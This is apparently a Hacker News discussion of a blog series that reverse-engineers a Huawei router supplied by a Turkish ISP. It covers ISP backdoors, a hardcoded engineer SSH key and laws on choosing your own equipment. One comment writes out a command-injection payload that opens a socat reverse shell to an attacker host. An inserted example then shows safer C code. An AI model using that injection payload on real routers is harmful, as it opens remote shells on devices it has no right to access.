A detailed look at the router provided by my ISP

611 points by paddlesteamer, about 5 years ago

27 comments

blakesterz, about 5 years ago
Interesting read! There's actually 3 parts to this:

Part 2: https://0x90.psaux.io/2020/03/19/Taking-Back-What-Is-Already-Yours-Router-Wars-Episode-II/

And 3: https://0x90.psaux.io/2020/03/22/Taking-Back-What-Is-Already-Yours-Router-Wars-Episode-III/

Summary from the end of Part 3:

"So we managed to change passwords for both ssh and telnet, gain access to Root user for the web interface, changed that password too. We changed ACS URL to ours and remove the IP restrictions. To put it simply, we cleaned up our router from our ISP. Good for our privacy."

jason0597, about 5 years ago
It's funny to think that if you were to report all of your findings to your local newspaper (Turkish newspaper in this case), as to how Turkish ISPs have complete access to your router or how Huawei (China) has an SSH key for your router, people would go absolutely ballistic. But for us it's just another day of expected craziness and we're tired of talking about it.

LeonM, about 5 years ago
In the Netherlands we now have a law where ISPs must allow your own choice of network equipment. This means they must give you the required information on how to connect your own device with their network.

I have a fiber connection, which I connected directly to a Ubiquiti router through a suitable SFP module. My ISP supplied the information on the fiber type and which VLAN IDs to set up for internet, TV and telephony.

This way I have my own equipment, that I control myself. The 'modem' [0] which my ISP supplied is still in its original, unopened box.

miki123211, about 5 years ago
Apparently a Polish carrier called Multimedia has recently introduced a new, revolutionary service for some customers. It's called "set up a custom wi-fi configuration", and it's just 5 PLN (a little over $1)! It lets you think up an SSID and password, and configure your router to use those! That's an amazing invention, isn't it? /s

Some customers apparently have absolutely no access to their routers, not even to the web interface, and they can't use their own either. All reconfiguration must be done through the customer service portal or by phone. That means the carrier can charge for every little thing, including changing the Wi-Fi config! I'm not sure if you can even bridge, but I guess not. Note that this does not affect all customers of that carrier, just a minority.

davedx, about 5 years ago
Fantastic write up from a hacking point of view. I did wonder about this statement though:

"This is very invasive and unacceptable. It may seem necessary to apply security patches published by your ISP but the user should be able to disable it whenever she wants."

Legally, at least in countries where I've lived, the ISP still owns the router. This surprised me a bit when I first found out, but then I got used to the idea, but you should treat any ISP or telecom gear in your house as something that's "rented but still owned and controlled by someone else".

mercora, about 5 years ago
It looks like this CLI has some hardcoded shell commands with variable substitutions that look possibly unprotected against command injection.

For example

    iptables %s > %s 2>&1

could probably be executed as

    iptables -L; socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane > /var/IptablesInfo 2>&1

by issuing

    iptables -L; socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane

and therefore it might be possible to get real shell access too.
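
Added example (not part of the thread and not the router's firmware code): the format-string pattern from the comment above next to a shell-free equivalent that validates arguments and uses `execv` with `dup2` for the redirect. The function names, the character allowlist and the `/sbin/iptables` path are assumptions made for illustration.

```c
#include <ctype.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Pattern from the comment: user text pasted into a line meant for system(). */
int build_shell_cmd(char *out, size_t n, const char *args, const char *outfile)
{
    return snprintf(out, n, "iptables %s > %s 2>&1", args, outfile);
}

/* Hardened, step 1: split buf on spaces into argv[] and accept only characters
 * iptables options need. Modifies buf. Returns argc, or -1 on rejection. */
int build_argv(char *buf, char *argv[], int max)
{
    int argc = 0;
    argv[argc++] = "iptables";
    for (char *tok = strtok(buf, " "); tok; tok = strtok(NULL, " ")) {
        for (const char *p = tok; *p; p++)
            if (!isalnum((unsigned char)*p) && !strchr("-_.:/,!", *p))
                return -1;                /* ; | $ ` > & and friends */
        if (argc >= max - 1) return -1;   /* too many arguments */
        argv[argc++] = tok;
    }
    argv[argc] = NULL;
    return argc;
}

/* Step 2: no shell; redirect via open()/dup2(). /sbin/iptables is assumed. */
int run_iptables(char *argv[], const char *outfile)
{
    pid_t pid = fork();
    if (pid == 0) {
        int fd = open(outfile, O_WRONLY | O_CREAT | O_TRUNC, 0600);
        if (fd < 0 || dup2(fd, 1) < 0 || dup2(fd, 2) < 0) _exit(126);
        execv("/sbin/iptables", argv);
        _exit(127);                       /* exec failed */
    }
    int status = 0;
    return (pid < 0 || waitpid(pid, &status, 0) < 0) ? -1 : status;
}

int main(void)
{
    char cmd[128], in[] = "-L; id", *av[8];   /* constructed input */
    build_shell_cmd(cmd, sizeof cmd, in, "/var/IptablesInfo");
    printf("shell would parse: %s\nargv builder: %d\n", cmd, build_argv(in, av, 8));
}
```

With the shell removed, `;` has no special meaning even if it slipped through, so the allowlist is a second layer rather than the only barrier.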

sph, about 5 years ago
Very interesting article.

What about that precompiled .ssh/authorized_keys with user z00163152@HUAWEI-627FB9A3 mentioned in Part 3?

Any reason why a router firmware would permit root access to anyone at all? Definitely sounds like a backdoor to me.

zeroflow, about 5 years ago
...and that's why my ISP's router is running in modem mode with a non-ISP-controlled router from Ubiquiti behind it - which I may replace with a pfSense box in the future.

I'm pretty happy that my cable ISP is allowing this mode so I don't have to double-NAT in my setup.

AdmiralAsshat, about 5 years ago
I never thought to nmap my own router until reading this.

    PORT      STATE SERVICE
    53/tcp    open  domain
    80/tcp    open  http
    631/tcp   open  ipp
    5000/tcp  open  upnp
    7777/tcp  open  cbt
    20005/tcp open  btx

Now begins the three-hours-and-counting rabbit hole of trying to figure out what the hell is running on ports 7777 and 20005. Or why UPNP is apparently running, despite UPNP being explicitly disabled on the Netgear router's admin page.

lxe, about 5 years ago
> After looking into folders, I found some interesting files. I won’t go through them here but I want to mention just one of them: [$ cat etc/ssh/authorized_keys]. Maybe an engineer from Huawei (I assume z00163152@HUAWEI-627FB9A3) who owns a specific DSS key, can connect all HG253s routers without needing a password, who knows?

Who knows indeed?!

fulafel, about 5 years ago
Trivia: Strictly speaking a box that does NAT is not a router in the IP protocol sense, it's a kind of proxy. The router requirements RFC explicitly forbids altering most fields (incl the address field) in the IP header.

ege_erdogan, about 5 years ago
I am using the exact same router from the same ISP. I was wondering what the problem was when I wasn't able to forward port 22 to my computer for an SSH connection.

I had thought it had something to do with the ISP allocating the same static IP to multiple clients and blocking some common ports to prevent collisions (ended up using port 109.. something for SSH). Turns out it was more interesting!

jscholes, about 5 years ago
Enjoyed this write-up, but most of the exploration seemed to be facilitated by someone having already leaked the CLI root password online. Anyone have suggestions on how you might otherwise obtain that information?

j_h, about 5 years ago
EU net neutrality regulation grants end users the right to use their own equipment.

https://fsfe.org/activities/routers/

mafuy, about 5 years ago
Many people here pointed out a problem: Removing access for the ISP and/or device manufacturer means they cannot fix bugs remotely and automatically. This is bad in situations like when the Mirai malware hit.

How about this?: "You can use your own device and we provide all required information, but there will be no advanced support and you have to check for bugfixes yourself monthly."

... now that I wrote it, I see the answer: There is no way to enforce this, especially not reliably.

greatjack613, about 5 years ago
Finally some proof that Huawei does have back doors in their network equipment.

In part 3 https://0x90.psaux.io/2020/03/22/Taking-Back-What-Is-Already-Yours-Router-Wars-Episode-III/ the author writes that a Huawei engineer has an authorized ssh key that would allow them to access your router.

Just Wow!

gumby, about 5 years ago
I clicked through to the two follow ups — this is both excellent sleuthery and a wonderful write up.

PascLeRasc, about 5 years ago
Slightly off-topic: I'd really like to run screenfetch on my router (Asus RT-N66U), but it doesn't have enough free space to sftp the script to it [1]. Piping the script just freezes up. Does anyone know a good workaround? Has anyone ever tried this?

[1] https://unix.stackexchange.com/questions/510947/how-can-i-run-a-script-on-a-unix-box-without-enough-space-to-store-it

hestefisk, about 5 years ago
My ISP (Internode) provide a ‘modem’ for my NBN hybrid coax / fibre connection. I just put my OPNSense router in front of it and it’s all secure. They provided me with all the config settings, which are a bit more obscure than usual (PPPoE but on a specific vlan tag). Works like a charm and I don’t have to worry about weird government wiretapping or backdoors. My ISP provide an IPv6 range too, which is pretty cool.

Thaxll, about 5 years ago
You're lucky to have an SSH server active, on mine I had to open the router and dump the firmware manually :/

skizm, about 5 years ago
My ISP has a cloud access "feature". If I go to 192.168.1.1 it redirects me to their "router.MYISP.net" site. What's the best way to go about disabling this? Should I just dump the rented router for my own?

tibbydudeza, about 5 years ago
Wow, some good detective skills at work here, got a similar Huawei HG635 from my provider ... kept it because it supports LTE cutover.

Fortunately some kind person leaked the admin password so that I could configure it to my liking.

wyclif, about 5 years ago
I'm overseas now, and using one of these crappy ISP-provided routers. I miss my nice Linksys router back home with high-density mesh, tri-band WiFi, and four gigabit ethernet ports.

k__, about 5 years ago
The only router with good admin interface I ever had was one with open source software.

Every other router, for 20 years now, had a slow and buggy web interface.

Why is this?!

sloshnmosh, about 5 years ago
I very much enjoyed this! I bookmarked your site and hope to read more of your posts in the future.

non-entity, about 5 years ago
A while back, I was playing around with the cable modem / router the ISP gave me because I was curious and an idiot. After screwing around a bit, I managed to find a vulnerability that exposed technician credentials in plaintext and they actually worked. Had no idea where to report it though, because the manufacturer's contact page could be summed up as *fuck you we don't talk directly to consumers*. I don't think the vulnerability was that bad, as you had to be logged in to the web interface already with another account, but still.

I don't really trust ISP provided hardware / software now though.

0xff00ffee, about 5 years ago
Why did port 8015 show up on the remote system after resetting firmware? Shouldn't nmap have reported that?